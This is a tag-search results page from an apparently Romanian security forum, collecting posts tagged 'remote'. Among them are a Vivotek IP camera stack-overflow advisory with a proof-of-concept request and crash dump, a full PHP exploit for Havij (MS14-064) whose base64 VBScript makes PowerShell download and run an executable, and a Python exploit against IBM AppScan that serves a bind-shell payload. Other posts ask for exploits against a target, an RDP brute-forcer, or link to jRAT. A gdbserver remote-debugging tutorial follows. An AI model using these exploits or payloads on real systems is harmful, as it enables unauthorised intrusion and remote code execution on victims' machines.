Search the Community
Showing results for tags 'remote'.
-
Hi, I have a log from a newsgroup NNTP header from a newsgroup message containing 3 string/numbers which I would like to further investigate Xref: news.netfront.net 24hoursupport.helpdesk:77925 Injection-Info:logging-data="74569" AND Message-ID: qjmbe4$28q9$1@adenine.netfront.net is there a tool/script/program to query remote NNTP server adenine.netfront.net / netfront.net with those string/numbers 77925/74569/qjmbe4$28q9$1 that would return more info ? thank's in advance :)
-
Salut, imi cer scuze pentru ca am postat in sectiunea gresita. Ma gandesc ca aici sunt la sectiunea potrivita. SI revin cu intrebarea: Cine ma poate ajuta sa identific vulnerabilitatiile port-ului 80? Ce exploit-uri pot sa folosesc ca sa obtin controlul remote asupra tintei. Pana acum am incercat tot felul si nu am reusit. Daca imi spune cineva ce imi scapa as fi recunoscator. Multumesc, Ossian.
- 12 replies
-
- 1
-
- cracking
- gain access
-
(and 2 more)
Tagged with:
-
Many Vivotek IP cameras suffer from a remote stack overflow vulnerability. Device models include CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, and VC8101. [STX] Subject: Vivotek IP Cameras - Remote Stack Overflow Researcher: bashis <mcw noemail eu> (September-October 2017) PoC: https://github.com/mcw0/PoC Release date: November 13, 2017 Full Disclosure: 43 days Attack Vector: Remote Authentication: Anonymous (no credentials needed) Firmware Vulnerable: Only 2017 versions affected Firmware Patched: October 2017 and higher Device Model: CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS, FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA, FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1, FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379, FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2, FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377, IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564, MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more Download Updated Firmware: http://www.vivotek.com/firmware/ [Timeline] October 1, 2017: Reported findings with all details to Vivotek Cybersecurity October 2, 2017: First response from Vivotek October 5, 2017: ACK of findings from Vivotek October 11, 2017: Vivotek reported first fixed Firmware October 12, 2017: After request, Vivotek provided samples of fixed Firmware October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory November 1, 2017: Agreed on publication November 13, 2017 November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not. November 13, 2017: No reply from Vivotek, Full Disclosure as planned. [Details] Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek. The stack overflow is triggered by "PUT" or "POST" request: [PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n However, the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack: "[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request: "[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" Notes: 1. B to I = $R4-$R11; X = $PC 2. Size of request availible in $R3 at the LDMFD 3. Max request size: 9182 bytes (0x1FFF) 4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx) 5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes 6. Stack not protected with "Stack canaries" 7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a; 8. heap: Non-executable + Non-ASLR 9. stack: Non-executable + ASLR [PoC] $ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76eb2c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x75 117 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7e92dac0 0x7e92dac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) $ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80 (gdb) target remote 192.168.57.20:23946 Remote debugging using 192.168.57.20:23946 0x76e82c5c in ?? () (gdb) c Continuing. Program received signal SIGSEGV, Segmentation fault. 0x58585858 in ?? () (gdb) bt #0 0x58585858 in ?? () #1 0x000188f4 in ?? () Backtrace stopped: previous frame identical to this frame (corrupt stack?) (gdb) i reg r0 0x1 1 r1 0x47210 291344 r2 0x0 0 r3 0x4f 79 r4 0x42424242 1111638594 r5 0x43434343 1128481603 r6 0x44444444 1145324612 r7 0x45454545 1162167621 r8 0x46464646 1179010630 r9 0x47474747 1195853639 r10 0x48484848 1212696648 r11 0x49494949 1229539657 r12 0x1 1 sp 0x7ec9cac0 0x7ec9cac0 lr 0x188f4 100596 pc 0x58585858 0x58585858 cpsr 0x60000010 1610612752 (gdb) Have a nice day /bashis [ETX] Source
-
- 1
-
- vivotek ip
- remote
-
(and 3 more)
Tagged with:
-
Caut un linc pentru R & D Pbrute v.3.0 RC2, ma puteti ajuta?
-
- rdp
- bruteforce
-
(and 1 more)
Tagged with:
-
jRAT v5 Java Remote Administration Download: DepositFiles
-
#!/usr/bin/php <?php # Title : Havij OLE Automation Array Remote Code Execution # Affected Versions: All Version # Founder : ITSecTeam # Tested on Windows 7 / Server 2008 # # # Author : Mohammad Reza Espargham # Linkedin : https://ir.linkedin.com/in/rezasp # E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com # Website : www.reza.es # Twitter : https://twitter.com/rezesp # FaceBook : https://www.facebook.com/mohammadreza.espargham # # # OleAut32.dll Exploit MS14-064 CVE2014-6332 # # # 1 . run php code : php havij.php # 2 . open "Havij" and Enter your exploit link http://ipaddress:80/ # 3 . go to "Setting" and Click "Load Cookie" # 4 . Your Link Download/Execute on your target # 5 . Finished #Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY $port=80; # Port Address $link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link $reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); socket_bind($reza, 0,$port); socket_listen($reza); print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n"; $msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11 bGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj cmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl bGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy ZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG SUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh dGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl cnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1 bmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg YWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg IHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt eWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4 dAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w KSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv LCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu Zm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1 bmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p dCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp JmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm Y2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw MCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50 LndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg ICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg ICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K IApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy ZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp b24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD cmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg ICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm dW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u IEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg UHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo MCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo Mik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g IFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt b2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt KGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv ICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo ZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg ICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg ICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg Zm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2 NzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog ICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl cj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK ICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog ICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg IElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u PDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg ICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9 bWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu ICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg ICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK ICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg ICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK ICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg ICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0 eXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK ICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg ICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92 ZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg ICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp bSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu Y3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl cnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg IGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg IAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv bgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg=='; $msgd=base64_decode($msg); $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd); for ( { if ($client = @socket_accept($reza)) { socket_write($client, "HTTP/1.1 200 OK\r\n" . "Content-length: " . strlen($msgd) . "\r\n" . "Content-Type: text/html; charset=UTF-8\r\n\r\n" . $msgd); print "\n Target Checked Your Link \n"; } else usleep(100000); } ?>
-
- #/usr/bin/php
- array
-
(and 3 more)
Tagged with:
-
#!/usr/bin/python import BaseHTTPServer, socket ## # IBM Security AppScan Standard OLE Automation Array Remote Code Execution # # Author: Naser Farhadi # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909 # # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7 # # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ # if you able to exploit IE then you can exploit appscan and acunetix # This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And # Metasploit windows/shell_bind_tcp Executable Payload # # Usage: # chmod +x appscan.py # ./appscan.py # ... # nc 172.20.10.14 333 # # Video: http://youtu.be/hPs1zQaBLMU ## class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(req): req.send_response(200) if req.path == "/payload.exe": req.send_header('Content-type', 'application/exe') req.end_headers() exe = open("payload.exe", 'rb') req.wfile.write(exe.read()) exe.close() else: req.send_header('Content-type', 'text/html') req.end_headers() req.wfile.write("""Please scan me! <SCRIPT LANGUAGE="VBScript"> function runmumaa() On Error Resume Next set shell=createobject("Shell.Application") command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\ 'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');" shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0 end function dim aa() dim ab() dim a0 dim a1 dim a2 dim a3 dim win9x dim intVersion dim rnda dim funclass dim myarray Begin() function Begin() On Error Resume Next info=Navigator.UserAgent if(instr(info,"Win64")>0) then exit function end if if (instr(info,"MSIE")>0) then intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) else exit function end if win9x=0 BeginInit() If Create()=True Then myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00) myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0) if(intVersion<4) then document.write("<br> IE") document.write(intVersion) runshellcode() else setnotsafemode() end if end if end function function BeginInit() Randomize() redim aa(5) redim ab(5) a0=13+17*rnd(6) a3=7+3*rnd(5) end function function Create() On Error Resume Next dim i Create=False For i = 0 To 400 If Over()=True Then ' document.write(i) Create=True Exit For End If Next end function sub testaa() end sub function mydata() On Error Resume Next i=testaa i=null redim Preserve aa(a2) ab(0)=0 aa(a1)=i ab(0)=6.36598737437801E-314 aa(a1+2)=myarray ab(2)=1.74088534731324E-310 mydata=aa(a1) redim Preserve aa(a0) end function function setnotsafemode() On Error Resume Next i=mydata() i=readmemo(i+8) i=readmemo(i+16) j=readmemo(i+&h134) for k=0 to &h60 step 4 j=readmemo(i+&h120+k) if(j=14) then j=0 redim Preserve aa(a2) aa(a1+2)(i+&h11c+k)=ab(4) redim Preserve aa(a0) j=0 j=readmemo(i+&h120+k) Exit for end if next ab(2)=1.69759663316747E-313 runmumaa() end function function Over() On Error Resume Next dim type1,type2,type3 Over=False a0=a0+a3 a1=a0+2 a2=a0+&h8000000 redim Preserve aa(a0) redim ab(a0) redim Preserve aa(a2) type1=1 ab(0)=1.123456789012345678901234567890 aa(a0)=10 If(IsObject(aa(a1-1)) = False) Then if(intVersion<4) then mem=cint(a0+1)*16 j=vartype(aa(a1-1)) if((j=mem+4) or (j*8=mem+8)) then if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if else redim Preserve aa(a0) exit function end if else if(vartype(aa(a1-1))<>0) Then If(IsObject(aa(a1)) = False ) Then type1=VarType(aa(a1)) end if end if end if end if If(type1=&h2f66) Then Over=True End If If(type1=&hB9AD) Then Over=True win9x=1 End If redim Preserve aa(a0) end function function ReadMemo(add) On Error Resume Next redim Preserve aa(a2) ab(0)=0 aa(a1)=add+4 ab(0)=1.69759663316747E-313 ReadMemo=lenb(aa(a1)) ab(0)=0 redim Preserve aa(a0) end function </script>""") if __name__ == '__main__': sclass = BaseHTTPServer.HTTPServer server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler) print "Http server started", socket.gethostbyname(socket.gethostname()), 80 try: server.serve_forever() except KeyboardInterrupt: pass server.server_close() Source
-
In the world we live in, there are different kinds of professions where debugging has been a vital piece of knowledge we must have in order to do our jobs successfully or more efficiently. There are different professions where debugging knowledge is important and are outlined below: Programmers: every programmer knows that debugging the program when it’s not working properly is the only right way to determine why the program is misbehaving and is not producing the intended results. There are still those programmers out there who use different kinds of print statements in order to display the debugging information in a way that makes sense to them only and for a limited amount of time. After a certain period of time, the debugging comments displayed in the stdout (or anywhere else where the output could easily be inspected, like in a file) don’t make any sense anymore, which is the primary reason why we should stop debugging like that – if we can even call it debugging at this point. In any case, whenever we put any kind of print statements into the code, the whole code needs to be recompiled when written in a low-level programming language. System Administrators: various system administrators are tasked with setting up and maintaining a whole infrastructure of the company, which is not an easy task to deal with. There will be different times when the programs of the programmers will malfunction and the system administrator will be the only one having access to the production environment where the program malfunctions. At times like these, the administrator should use a debugger in order to determine what the problem is and report it back to the programmers in order to fix it as soon as possible. Security Researchers: debugger skills can be lethal in the hands of a security specialist, because he can use it to make a program do unexpected things. Debuggers are indispensable when used to analyze how the program works in order to gain deeper understanding about the program internals. There are various fields of a security domain where knowledge about debuggers is a must have skill and the people not having mastered it already will have a hard time completing their jobs; such fields include reverse engineering, malware analysis, exploit writing, etc. The skills will come in handy even when dealing with web applications, for example, when we’ve reversed engineered a web application written in ASP.NET, which used custom encryption/decryption functions in order to pass data between the client and a server in an encrypted form. Having the reverse engineering skills, we quickly put together an algorithm, which was able to decrypt the encrypted data in order for us to modify it and then re-encrypt the data back to its encrypted form to have it sent to the server for processing, which revealed interesting XSS, URL redirection and other kinds of bugs. Despite our job profession outlined above, we should invest the time and learn how to debug properly, which will enable us to find problems sooner and with ease; no more print statements need be introduced into the code. When debugging properly, we have to choose a debugger of our choice and run the program in a debugger, and set appropriate breakpoints so the execution will stop at the time of the program misbehavior, after which we can inspect the program state. Inspecting the program state doesn’t include only a few of the items we had output to the stdout when doing it the wrong way, but the whole program state – we no longer have to put additional print statements into the code, recompile and rerun the program in order to get more information about the program state. Instead we can get all that information for free out of a program stopped in a debugger without many problems. Presenting different kinds of debuggers There are many debuggers that we can use for debugging and are separated into two groups at the highest level, which are presented below. Note that most operating systems are constituted from two parts: the user-mode applications in ring 3, where all of the applications run from and have only limited access via the system calls to the kernel-mode operating system code in ring 0. Therefore, depending on whether we’re debugging a user-mode application in ring 3 or an operating system function/structure in ring 0, the debuggers are divided between two groups presented below. Kernel-Mode debuggers: the debuggers running in kernel-mode, which are able to debug the kernel operating system internals as well as the user-mode applications. An example of debuggers supporting kernel-mode debugging are the following: SoftICE, Syser, HyperDbg, WinDbg, Gdb, VirtDbg. User-Mode debuggers: the debuggers running in user-mode, which are able to debug only the user-mode applications, but don’t have access to the kernel. User-mode debuggers are the following: OllyDbg, Hopper, Hiew, Ida Pro, Dbg, x64dbg, VDB, Radare, etc. All of the debuggers have support for debugging local programs or systems, but only some of them have remote debugging possibilities that allow us to use debuggers in the cloud. The following debuggers have a possibility of a remote debugging session, which we can use in a cloud-based session and debug the problem remotely: WinDbg Gdb VirtDbg Ida Pro Radare Hopper Remote debugging In this example, we’ll take a look at how we can debug an application running in the cloud remotely by using gdb, which can be downloaded and installed by running the following commands: wget ftp://sourceware.org/pub/gdb/releases/gdb-7.5.tar.bz2 # tar xvjf gdb-7.5.tar.bz2 # cd gdb-7.5/gdb/gdbserver/ # ./configure && make && make install Let’s first display all the parameters that we can pass to gdbserver program. # gdbserver Usage: gdbserver [OPTIONS] COMM PROG [ARGS …] gdbserver [OPTIONS] --attach COMM PID gdbserver [OPTIONS] --multi COMM COMM may either be a TTY device (for serial debugging), or HOST:PORT to listen for a TCP connection. Options: --debug Enable general debugging output. --remote-debug Enable remote protocol debugging output. --version Display version information and exit. --wrapper WRAPPER -- Run WRAPPER to start new programs. --once Exit after the first connection has closed. Let’s now present a simple program, that accepts exactly one argument, which must be set to the “secretarg” string in order for the program to return the secret key “KeepingHiddenSecrets”. Otherwise, the program exists with a notification that incorrect input string was passed to the program as the first argument. The program can be seen below. #include <stdio.h> int main(int argc, char **argv) { if(argc != 2) { printf("The wrong number of parameters passed into the program; quitting.\n"); exit(1); } if(strcmp(argv[1], "secretarg") == 0) { printf("The secret password is: KeepingHiddenSecrets.\n"); } else { printf("The secret password is not revealed to you, because you didn't supply the right secret argument.\n"); } return 0; } We can compile the program into the main executable by simply running the “gcc main.c -o main” command, after which we can run the program by running “./main secretarg”, which will print the secret key to the standard output. Imagine that we’re a system administrator or a security researcher and only have access to the main executable, but we don’t have the code, neither we know the secret argument we have to pass to the program in order to reveal the secret key. To complicate matters somehow, let’s also imagine that the program is running on a server on the cloud and can’t be easily recompiled and used on our local computer; nevertheless, we have access to the server and we’re able to run and debug the program. Note that the compiled program should also be copied to the host system where we’ll be inputting the gdb commands in order to be sent to the gdbserver, so the gdb will be able to load and use program symbols. In such cases, it’s best to run the program remotely in the cloud in gdbserver in order to debug it. We can use the command line below to bind to the 0.0.0.0:8080 host and port combination where the remote debugging session will be accessible. We have to run the following commands on the remote host in the cloud where the program will be debugged. Note that the two processes are created during the debugging session because we’ve invoked the program two times, once with the wrong input parameter and another time with the right input parameter. The first invocation of the program revealed that the input argument was not correct, while the second invocation received the secret password, because we’ve passed the correct input argument to the program invocation. # gdbserver --multi 0.0.0.0:8080 Listening on port 8080 Remote debugging from host 4.3.2.1 Process /srv/main created; pid = 20272 The secret password is not revealed to you, because you didn't supply the right secret argument. Child exited with status 0 Process /srv/main created; pid = 20274 The secret password is: KeepingHiddenSecrets. Child exited with status 0 Then we can use the netstat command to confirm whether the gdbserver has actually been started, which can be seen below. # netstat -luntp | grep LISTEN tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 20223/gdbserver After starting the remote session, we can connect to it by executing the following commands on the client, which connects to the remote session and starts debugging the remote process. # gdb (gdb) target extended-remote 1.2.3.4:8080 Remote debugging using 1.2.3.4:8080 (gdb) set remote exec-file /srv/main (gdb) file /tmp/main Reading symbols from /tmp/main...done. (gdb) set architecture i386:x86-64:intel The target architecture is assumed to be i386:x86-64:intel (gdb) run test Starting program: /tmp/main test [Inferior 1 (process 20272) exited normally] (gdb) run secretarg Starting program: /tmp/main secretarg [Inferior 1 (process 20274) exited normally] At this point we can run any command supported by the gdb debugger right on the remote session in the cloud, which enables us to do anything we would have done with a local process. Conclusion Debugging skills are a vital and very important piece of knowledge we have to gain in order to complete our job faster and more efficiently. The hardest thing to do in the process is grasping the idea that such a knowledge will actually benefit us all. After we’ve convinced ourselves that the debugging knowledge will come in handy, we have to choose an appropriate debugger and learn as much as we can about it. Usually, there are different articles and tutorials, even books written on the subject, but we must not despair. We can start slow with a simple tutorial and work our way from there. Whenever a new bug arises, we should take some extra time to find the problem with a debugger rather than using print statements. At first, it will seem like a waste of time, but sooner or later, it will become extremely easy and the first benefits of the newly acquired knowledge will be visible. We’ve seen how easy it is to debug applications in the cloud by using one of the remote capabilities of various debuggers that support it. By using remote debugging, we can easily start a program in the cloud and debug it remotely, not having to setup our own environment when trying to determine what the problem 